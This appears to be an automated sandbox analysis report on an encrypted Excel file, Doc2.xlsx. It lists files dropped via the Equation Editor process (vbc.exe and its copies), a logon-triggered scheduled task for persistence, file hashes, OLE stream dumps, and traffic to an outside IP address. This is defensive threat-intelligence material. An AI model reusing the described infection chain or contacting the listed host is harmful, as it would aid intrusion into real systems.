                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\msoF96E.tmp
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:PC bitmap, Windows 3.x format, 20 x 20 x 24
                                                                                      Category:dropped
                                                                                      Size (bytes):1254
                                                                                      Entropy (8bit):5.835900066445133
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:qEnXJZiYfAzWGWCZGw3jW5uyPBPcemkGFM3JJJJJOm6JJJJJZEoJJJJJuRl6JJJt:znXJLA7TjGRc3M3JJJJJOm6JJJJJuoJ3
                                                                                      MD5:A3C62E516777C15BF216F12143693C61
                                                                                      SHA1:277BFA1F59B59276EF52EF39AE26D4DD3BDB285F
                                                                                      SHA-256:616F688DE9FC058BCD3FD414C3B49473AB0923EB06479EDA252E351895760408
                                                                                      SHA-512:AA2E51951CF7D51FC8E5F24D49403A9C3EE83E57E6080BF5FBDAB73D77020054B561D9B733BC60366B5E2A2F5570650052BFD5196196EFA24EF3E26247D3ADF2
                                                                                      Malicious:false
                                                                                      Preview: BM........6...(..............................................}l.lXvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaLvaL.........................................................vaL.........................................................vaL.........................................................vaL..........{..{..{..{..{..{..{..{..{..{..{..{..{..{..{...vaL..........................u........}.z.i......vaL......................x....}............]......vaL.....................{.............w........vaL.................~.............w.........vaL.........................................vaL.........................................vaL......................................................vaL......................................................vaL......................................................vaL......................................................vaL.............................................
                                                                                      C:\Users\user\AppData\Local\Temp\Cab6E6E.tmp
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:Microsoft Cabinet archive data, 61020 bytes, 1 file
                                                                                      Category:dropped
                                                                                      Size (bytes):61020
                                                                                      Entropy (8bit):7.994886945086499
                                                                                      Encrypted:true
                                                                                      SSDEEP:1536:IZ/FdeYPeFusuQszEfL0/NfXfdl5lNQbGxO4EBJE:0tdeYPiuWAVtlLBGm
                                                                                      MD5:2902DE11E30DCC620B184E3BB0F0C1CB
                                                                                      SHA1:5D11D14A2558801A2688DC2D6DFAD39AC294F222
                                                                                      SHA-256:E6A7F1F8810E46A736E80EE5AC6187690F28F4D5D35D130D410E20084B2C1544
                                                                                      SHA-512:EFD415CDE25B827AC2A7CA4D6486CE3A43CDCC1C31D3A94FD7944681AA3E83A4966625BF2E6770581C4B59D05E35FF9318D9ADADDADE9070F131076892AF2FA0
                                                                                      Malicious:false
                                                                                      Preview: MSCF....\.......,...................I........l.........R.q .authroot.stl.N....5..CK..8T....c_.d....A.K....=.D.eWI..r."Y...."i..,.=.l.D.....3...3WW.......y...9..w..D.yM10....`.0.e.._.'..a0xN....)F.C..t.z.,.O20.1``L.....m?H..C..X>Oc..q.....%.!^v%<...O...-..@/.......H.J.W...... T...Fp..2.|$....._Y..Y`&..s.1........s.{..,.":o}9.......%._.xW*S.K..4"9......q.G:.........a.H.y.. ..r...q./6.p.;.`=*.Dwj......!......s).B..y.......A.!W.........D!s0..!"X...l.....D0...........Ba...Z.0.o..l.3.v..W1F hSp.S)@.....'Z..QW...G...G.G.y+.x...aa`.3..X&4E..N...._O..<X.......K...xm..+M...O.H...)..........*..o..~4.6.......p.`Bt.(..*V.N.!.p.C>..%.ySXY.>.`..f|.*...'^K`\..e......j/..|..)..&i...wEj.w...o..r<.$.....C.....}.x...L..&..).r..\...>....v........7...^..L!.$..'m...*,*.....7F$..~..S.6$S.-y....|.!.....x...~k...Q/.w.e...h.[...9<x...Q.x.][}*_%Z..K.).3..'....M.6QkJ.N........Y..Q.n.[.(.... ...Bg..33..[...S..[... .Z..<i.-.]...po.k.,...X6......y3^.t[.Dw.]ts. R..L..`..ut_F....
                                                                                      C:\Users\user\AppData\Local\Temp\Tar6E6F.tmp
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):158974
                                                                                      Entropy (8bit):6.311775051607851
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:ilqXley2pR737/99UF210gNucQodv+1//dMrYJntYyjCQx7s2t6OGP:iQXipR7O/gNuc/v+lXjCQ7sO0
                                                                                      MD5:E4731F8A3E7352DBA44EC7D3DD15BAEA
                                                                                      SHA1:D5CA0025FBD356DEB8EDE35001F93039625562A5
                                                                                      SHA-256:6C78EF77ACEF978321CCD30EE126FB7D30285BC186DDBDBE8B3E8F6E69D01353
                                                                                      SHA-512:E68BA11A73E28404A274F0EE4ECC97A8BEFEDB91A20BDC5B00C72AE8928DD63924E351BE8A88E40960D54CE07E21EA21710DB0DFA00A5558C4264490E27B6988
                                                                                      Malicious:false
                                                                                      Preview: 0..l...*.H.........l.0..l....1.0...`.H.e......0..\...+.....7.....\.0..\.0...+.....7........_.T.....210611210413Z0...+......0..\.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                                                      C:\Users\user\AppData\Local\Temp\tmp74F2.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1626
                                                                                      Entropy (8bit):5.159109128857439
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBntn:cbhZ7ClNQi/rydbz9I3YODOLNdq3z
                                                                                      MD5:2A11DAC0B7306A104AFCC907AE492B39
                                                                                      SHA1:CE842A57682BA01171DBBFB98C189DE9920B42CA
                                                                                      SHA-256:92866CDA7C15EBE0904C2F5BB77D1764EBC9577E7ADE131AE9EECD0378EB9151
                                                                                      SHA-512:5187B3DBE1BF2E63A02B6F3263BC30F92C15EC04575E2FB4DBE6C5C837BA05C6A7FB091462D1FAA8C2ED8E646C82B4D7F5D88A2B3A94B3A05C6518197942FCCD
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                      C:\Users\user\AppData\Local\Temp\tmp7511.tmp
                                                                                      Process:C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1626
                                                                                      Entropy (8bit):5.159109128857439
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBntn:cbhZ7ClNQi/rydbz9I3YODOLNdq3z
                                                                                      MD5:2A11DAC0B7306A104AFCC907AE492B39
                                                                                      SHA1:CE842A57682BA01171DBBFB98C189DE9920B42CA
                                                                                      SHA-256:92866CDA7C15EBE0904C2F5BB77D1764EBC9577E7ADE131AE9EECD0378EB9151
                                                                                      SHA-512:5187B3DBE1BF2E63A02B6F3263BC30F92C15EC04575E2FB4DBE6C5C837BA05C6A7FB091462D1FAA8C2ED8E646C82B4D7F5D88A2B3A94B3A05C6518197942FCCD
                                                                                      Malicious:false
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                      C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):1626
                                                                                      Entropy (8bit):5.159109128857439
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBntn:cbhZ7ClNQi/rydbz9I3YODOLNdq3z
                                                                                      MD5:2A11DAC0B7306A104AFCC907AE492B39
                                                                                      SHA1:CE842A57682BA01171DBBFB98C189DE9920B42CA
                                                                                      SHA-256:92866CDA7C15EBE0904C2F5BB77D1764EBC9577E7ADE131AE9EECD0378EB9151
                                                                                      SHA-512:5187B3DBE1BF2E63A02B6F3263BC30F92C15EC04575E2FB4DBE6C5C837BA05C6A7FB091462D1FAA8C2ED8E646C82B4D7F5D88A2B3A94B3A05C6518197942FCCD
                                                                                      Malicious:true
                                                                                      Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>
                                                                                      C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):479232
                                                                                      Entropy (8bit):7.4170903584629215
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NUdeni+TLedHTiw3CzfM5B2OR0GU4V24TfWOQCs/I:KciCqdziw3KeRHtJHs/I
                                                                                      MD5:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      SHA1:6C0B89DC4C773E51D660780450CBD148F2FF3211
                                                                                      SHA-256:3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                                                                                      SHA-512:B6804A6968FA7A6F68D1A8F6161A0C69584DBFEB88EFF5F7784C259F2886FE1B444438576D47AB5DDA24496A619DFBFFE02050BC679A3F3E13DD6BC82F61C3C1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: kwFDCU89PZ.exe, Detection: malicious, Browse
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.`..............0.. ... .......5... ...@....... ....................................@.................................05..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\AppData\Roaming\WzyRXCWtdGSdEA.exe
                                                                                      Process:C:\Users\Public\vbc.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):479232
                                                                                      Entropy (8bit):7.4170903584629215
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NUdeni+TLedHTiw3CzfM5B2OR0GU4V24TfWOQCs/I:KciCqdziw3KeRHtJHs/I
                                                                                      MD5:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      SHA1:6C0B89DC4C773E51D660780450CBD148F2FF3211
                                                                                      SHA-256:3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                                                                                      SHA-512:B6804A6968FA7A6F68D1A8F6161A0C69584DBFEB88EFF5F7784C259F2886FE1B444438576D47AB5DDA24496A619DFBFFE02050BC679A3F3E13DD6BC82F61C3C1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Joe Sandbox View:
                                                                                      • Filename: kwFDCU89PZ.exe, Detection: malicious, Browse
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.`..............0.. ... .......5... ...@....... ....................................@.................................05..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                      C:\Users\user\Desktop\~$Doc2.xlsx
                                                                                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):330
                                                                                      Entropy (8bit):1.4377382811115937
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                      MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                      SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                      SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                      SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                      Malicious:true
                                                                                      Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      C:\Users\Public\vbc.exe
                                                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):479232
                                                                                      Entropy (8bit):7.4170903584629215
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:NUdeni+TLedHTiw3CzfM5B2OR0GU4V24TfWOQCs/I:KciCqdziw3KeRHtJHs/I
                                                                                      MD5:6733D5E8934EAFF7C0087E7DE2C8E62A
                                                                                      SHA1:6C0B89DC4C773E51D660780450CBD148F2FF3211
                                                                                      SHA-256:3441D4122B712A32E1C0518F02903A632ECBF557FBAB71C510C732474D326CD1
                                                                                      SHA-512:B6804A6968FA7A6F68D1A8F6161A0C69584DBFEB88EFF5F7784C259F2886FE1B444438576D47AB5DDA24496A619DFBFFE02050BC679A3F3E13DD6BC82F61C3C1
                                                                                      Malicious:true
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 13%
                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u.`..............0.. ... .......5... ...@....... ....................................@.................................05..O....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      Static File Info

                                                                                      General

                                                                                      File type:CDFV2 Encrypted
                                                                                      Entropy (8bit):7.994513765705169
                                                                                      TrID:
                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                                                                                      File name:Doc2.xlsx
                                                                                      File size:1239552
                                                                                      MD5:7848697a2cff990710c69e8d97e55c13
                                                                                      SHA1:9af272f7dedd808c48b03d98d7eb75356b74f6ee
                                                                                      SHA256:ef17f47bcdb067d712661ddadff8ebee2924282c7fe21edd237e8094cc4ebdb0
                                                                                      SHA512:ec702b7110b6bebb405442a297221a20e4339cd5997323b7fd86bf6ee58cd68d8fe14f4156cc13e482734ff849686fe0bd3c23674ad4b61b76bd3d26714c27ff
                                                                                      SSDEEP:24576:552SgH474uoQ5xCHB+kXRPewR/LK9TevVGPYQuboKULGA:55us4hQS+khvRDKdGVG6kKG
                                                                                      File Content Preview:........................>.......................................................................................................|.......~......................................................................................................................

                                                                                      File Icon

                                                                                      Icon Hash:e4e2aa8aa4b4bcb4

                                                                                      Static OLE Info

                                                                                      General

                                                                                      Document Type:OLE
                                                                                      Number of OLE Files:1

                                                                                      OLE File "Doc2.xlsx"

                                                                                      Indicators

                                                                                      Has Summary Info:False
                                                                                      Application Name:unknown
                                                                                      Encrypted Document:True
                                                                                      Contains Word Document Stream:False
                                                                                      Contains Workbook/Book Stream:False
                                                                                      Contains PowerPoint Document Stream:False
                                                                                      Contains Visio Document Stream:False
                                                                                      Contains ObjectPool Stream:
                                                                                      Flash Objects Count:
                                                                                      Contains VBA Macros:False

                                                                                      Streams

                                                                                      Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                                                                                      File Type:data
                                                                                      Stream Size:64
                                                                                      Entropy:2.73637206947
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                      File Type:data
                                                                                      Stream Size:112
                                                                                      Entropy:2.7597816111
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                      File Type:data
                                                                                      Stream Size:200
                                                                                      Entropy:3.13335930328
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                      General
                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                      File Type:data
                                                                                      Stream Size:76
                                                                                      Entropy:2.79079600998
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 1225928
                                                                                      General
                                                                                      Stream Path:EncryptedPackage
                                                                                      File Type:data
                                                                                      Stream Size:1225928
                                                                                      Entropy:7.99880681599
                                                                                      Base64 Encoded:True
                                                                                      Data ASCII:. . . . . . . . . H . . T . . . . t . . . 4 . . . . T , . . . . k \\ . . . 0 . . 8 . A . . . . . . . . . o . . . * . . . ( . ( 1 . . . S j . f E . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p ) \\ u . . . . . . . v % q . Z p )
                                                                                      Data Raw:b5 b4 12 00 00 00 00 00 dd 48 dc b9 54 cd c0 13 14 74 b8 08 e8 34 d1 2e 1e b4 54 2c de c6 d5 c6 6b 5c f4 0b f5 30 01 d1 38 07 41 c8 f4 b2 fe e6 1f b2 d0 d6 6f 93 09 e1 2a ca 95 f9 28 93 28 31 f0 9a de 53 6a fb 66 45 0a 76 25 71 c0 5a 70 29 5c 75 cf 02 11 1a f9 f7 0a 76 25 71 c0 5a 70 29 5c 75 cf 02 11 1a f9 f7 0a 76 25 71 c0 5a 70 29 5c 75 cf 02 11 1a f9 f7 0a 76 25 71 c0 5a 70 29
                                                                                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                      General
                                                                                      Stream Path:EncryptionInfo
                                                                                      File Type:data
                                                                                      Stream Size:224
                                                                                      Entropy:4.51936765196
                                                                                      Base64 Encoded:False
                                                                                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . - . [ n . . . U & . . 1 . # . 9 . _ 6 . S e . . . = . . k . . . . . . . L . $ G $ . h f . . C . . . e . . . | . e . . y o . . . . .
                                                                                      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                      Network Behavior

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jul 22, 2021 18:12:31.099260092 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.153753996 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.153879881 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.154568911 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.208879948 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209455013 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209490061 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209507942 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209523916 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209538937 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209558010 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209579945 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209603071 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209620953 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209633112 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.209645987 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.209700108 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.209747076 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.217502117 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264138937 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264224052 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264271975 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264272928 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264297009 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264302969 CEST4916580192.168.2.22185.26.106.165
                                                                                      Jul 22, 2021 18:12:31.264308929 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264341116 CEST8049165185.26.106.165192.168.2.22
                                                                                      Jul 22, 2021 18:12:31.264357090 CEST4916580192.168.2.22185.26.106.165
